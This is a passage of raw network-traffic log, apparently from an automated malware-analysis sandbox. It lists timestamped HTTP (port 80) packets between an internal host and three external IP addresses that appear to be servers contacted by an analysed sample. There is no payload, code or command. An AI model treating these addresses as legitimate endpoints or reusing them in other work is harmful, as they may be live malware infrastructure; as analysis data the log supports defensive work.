                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479581118 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479585886 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479590893 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479595900 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479608059 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479614019 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479625940 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479636908 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479640007 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479650021 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479660988 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479665995 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479674101 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479686022 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479687929 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479697943 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479701996 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479728937 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479731083 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479743004 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479753971 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479753971 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479765892 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479775906 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479784966 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479787111 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479799032 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479810953 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479818106 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479824066 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479834080 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479839087 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479847908 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479851007 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479866028 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479876041 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479880095 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479893923 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479908943 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479928017 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479950905 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480268955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480288029 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480299950 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480309963 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480313063 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480320930 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480325937 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480339050 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480344057 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480350018 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480355978 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480364084 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480376959 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480382919 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480396986 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480427027 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480437994 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480451107 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480459929 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480473042 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480482101 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480483055 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480498075 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480509043 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480515957 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480523109 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480526924 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480545998 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480576038 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480583906 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480595112 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480604887 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480616093 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480627060 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480628967 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480638981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480650902 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480659008 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480662107 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480671883 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480674982 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480685949 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480691910 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480700016 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480711937 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480720043 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480730057 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480743885 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480746984 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480756998 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480761051 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480770111 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480779886 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480787039 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480792999 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480804920 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480815887 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480828047 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480829000 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480839014 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480846882 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480849981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480863094 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480871916 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480878115 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480890036 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480895042 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480901003 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480912924 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480921984 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480926991 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480938911 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480947971 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480951071 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480962038 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480973005 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480973959 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480987072 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480988026 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.480998993 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481007099 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481013060 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481024981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481035948 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481039047 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481046915 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481059074 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481067896 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481071949 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481084108 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481090069 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481095076 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481112957 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481148005 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481421947 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481435061 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481446981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481457949 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481467962 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481481075 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481479883 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481489897 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481522083 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481560946 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481573105 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481584072 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481595039 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481595993 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481609106 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481621027 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481627941 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481632948 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481646061 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481652021 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481658936 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481679916 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481698036 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481713057 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481724977 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481736898 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481749058 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481750965 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481760979 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481771946 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481779099 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481786013 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481797934 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481806993 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481806993 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481820107 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481829882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481836081 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481846094 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481853962 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481868029 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481873035 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481879950 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481890917 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481899023 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481903076 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481914997 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481919050 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481928110 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481939077 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481950998 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481952906 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481962919 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481976032 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481981039 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481987953 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.481993914 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482002020 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482012033 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482014894 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482028961 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482039928 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482043982 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482052088 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482063055 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482068062 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482074022 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482079029 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482084990 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482090950 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482095957 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482096910 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482146978 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482496977 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482510090 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482522011 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482532978 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482544899 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482554913 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482557058 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482568026 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482589006 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482616901 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482659101 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482671022 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482681036 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482692957 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482697010 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482712984 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482722998 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482724905 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482737064 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482749939 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482752085 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482762098 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482770920 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482774973 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482785940 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482789993 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482799053 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482810020 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482817888 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482821941 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482834101 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482842922 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482856035 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482858896 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482868910 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482881069 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482889891 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482892990 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482903004 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482907057 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482918024 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482923985 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482932091 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482943058 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482954025 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482954025 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482965946 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482973099 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482980013 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.482986927 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483002901 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483014107 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483015060 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483028889 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483040094 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483047009 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483057976 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483069897 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.483076096 CEST4971280192.168.2.9103.130.147.211
